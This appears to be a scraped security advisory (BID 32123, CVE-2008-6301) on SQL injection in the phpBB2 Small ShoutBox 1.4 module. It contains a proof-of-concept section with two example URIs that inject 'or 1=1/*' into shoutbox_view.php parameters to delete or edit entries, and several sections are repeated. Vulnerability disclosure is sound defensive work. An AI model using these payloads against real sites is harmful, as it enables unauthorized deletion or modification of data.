phpBB2 Small ShoutBox Module 'shoutbox_view.php' Multiple SQL Injection Vulnerabilities
BID:32123
Info
phpBB2 Small ShoutBox Module 'shoutbox_view.php' Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 32123 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-6301 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 05 2008 12:00AM |
| Updated: | May 07 2015 05:21PM |
| Credit: | StAkeR[at]hotmail[dot]it |
| Vulnerable: |
Przemo Small ShoutBox 1.4 |
| Not Vulnerable: | |
Discussion
phpBB2 Small ShoutBox Module 'shoutbox_view.php' Multiple SQL Injection Vulnerabilities
The phpBB2 Small ShoutBox Module is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Small ShoutBox 1.4 is vulnerable; other versions may also be affected.
The phpBB2 Small ShoutBox Module is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Small ShoutBox 1.4 is vulnerable; other versions may also be affected.
Exploit / POC
phpBB2 Small ShoutBox Module 'shoutbox_view.php' Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/shoutbox_view.php?mode=delete&id=-1 or 1=1/*
http://www.example.com/shoutbox_view.php?mode=edit&id=-1 or 1=1/*&name_id=1 or 1=1/*&date_edit=1225915829&name_edit=[NICKNAME]&clean_msg=[MESSAGE]
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/shoutbox_view.php?mode=delete&id=-1 or 1=1/*
http://www.example.com/shoutbox_view.php?mode=edit&id=-1 or 1=1/*&name_id=1 or 1=1/*&date_edit=1225915829&name_edit=[NICKNAME]&clean_msg=[MESSAGE]
Solution / Fix
phpBB2 Small ShoutBox Module 'shoutbox_view.php' Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
phpBB2 Small ShoutBox Module 'shoutbox_view.php' Multiple SQL Injection Vulnerabilities
References:
References:
- Vendor Homepage (Przemo)